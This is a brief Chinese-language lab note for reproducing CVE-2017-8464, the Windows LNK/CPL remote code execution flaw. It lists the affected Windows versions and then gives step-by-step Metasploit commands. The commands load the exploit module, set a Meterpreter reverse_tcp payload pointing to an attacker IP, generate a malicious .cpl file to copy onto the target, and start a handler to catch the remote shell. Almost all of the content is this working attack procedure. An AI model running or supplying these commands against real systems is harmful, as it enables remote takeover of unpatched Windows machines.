影響版本
windows 10
windwos RT 8.1
windows 8.1
windows 7
windows server 2016
windows server 2012 R2
windows server 2012
windows server 2008 R2
windows server 2008
復現
需下載工具https://github.com/rapid7/metasploit-framework/archive/master.zip進行配置;
msfconsole
搜索攻擊模塊search cve_2017_8464
沒有就下載工具進行配置參考連接https://www.jianshu.com/p/40763fa14424
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.117
exploit
會在/.msf4/local生成文件將FlashPlayerCPLApp.cpl文件複製到靶機
use exploit/multi/handler
set paylaod windows/meterpreter/reverse_tcp
set lhost 192.168.31.117
exploit
雙擊虛擬機中的文件;